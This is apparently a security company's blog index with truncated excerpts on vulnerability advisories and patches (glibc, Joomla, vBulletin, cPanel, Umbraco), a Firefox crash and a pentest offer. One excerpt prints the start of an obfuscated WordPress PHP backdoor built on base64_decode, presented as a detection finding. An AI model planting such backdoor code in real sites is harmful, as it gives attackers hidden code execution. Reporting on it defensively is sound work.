Firefox 47.0 Memory Access violation Crash – FIXED

We were working on Firefox browser automation for opening some of the URL for the malware analysis. We used the combination of python and selenium to perform automation and the After few mins, we stumble upon a Firefox crash, which was causing the memory access violation crash as shown in the following image. After few […]

SecureLayer7 Gratis PenTest Summer 2016

SecureLayer7 Gratis PenTest Summer 2016 You can now receive free penetration testing for 6 days! What is this about? Your open source software project stands a chance to win 2 full days of penetration testing from SecureLayer7, that too free of cost! That’s not possible! You are forging me! The SecureLayer7 PenTest Summer 2016 is […]

Backdoor PHP code WordPress

We have detected a Backdoor PHP code. It is often hidden in the WP writable directory. This backdoor is used to send PHP code execution.   <?php $yeqqdvu = 6110; function neceliemyz($rdcldpm, $oqwvlr) { $efogjgyh = ”; for($i=0; $i < strlen($rdcldpm); $i++){ $efogjgyh .= isset($oqwvlr[$rdcldpm[$i]]) ? $oqwvlr[$rdcldpm[$i]] : $rdcldpm[$i]; } $pgdnvjl=”base64_decode”; return $pgdnvjl($efogjgyh); } $hljnyoyp […]

How to fix CVE-2015-7547 glibc: getaddrinfo stack-based buffer overflow

RedHat released Patch for CVE-2015-7547 glibc: getaddrinfo stack-based buffer overflow.  A stack-based buffer overflow was found in the way the libresolv library performed dual A/AAAA DNS queries. A remote attacker could create a specially crafted DNS response which could cause libresolv to crash or, potentially, execute code with the permissions of the user running the library. Note: […]

Protect Against SQL Injection in ASP.Net

A lot of resources are available for SQL Injection attack, however  I will be focusing on the SQL injection protection sample codes in ASP.net. Wherever I meet developers, they are totally aware of SQL injection. On the other hand, they are not aware about how to fix the SQL injection as per the standard methodology. Before going […]

Umbraco – The open source ASP.NET CMS Multiple Vulnerabilities

Recently I got an assignment where I had to work on the Umbraco application – a free Open Source Content Management System built on the ASP.NET platform and is used by more than 2,25,000 websites. While performing the security testing of this application, I discovered serious vulnerabilities within this application, allowing to perform SSRF attack, CSRF Bypass […]

cPanel releases security patches for 20 critical vulnerabilities

The cPanel security team has identified several security concerns in their control panel software. They have also released patches to address all these security concerns with the cPanel and WHM product. This patch basically addresses 20 vulnerabilities in cPanel & WHM software versions 11.54, 11.52, 11.50, and 11.48. The patches include following vulnerability fix  Arbitrary […]

Joomla Remote Code Execution Vulnerability Fixed

The Joomla team just released a new Joomla version 3.4.6 to fix serious vulnerability, i.e. remote code execution. Directly from the Joomla announcement: Browser information is not filtered properly while saving the session values into the database what leads to a Remote Code Execution vulnerability. Joomla CMS versions 1.5.0 through 3.4.5 are vulnerable to remote code […]

PreAuth PHP Object Injection Critical Vulnerability in vBulletin Versions 5.1.4 to 5.1.9

vBulletin on 03 Nov 2015 released security patches. The vBulletin 5.1.4 to 5.1.9 is vulnerable to PHP Object injection, where attacker can take control of the website and dump the database of vBulletin forum. It is found that vulnerability is released in the public. This vulnerability is very serious and easy to exploit to compromise […]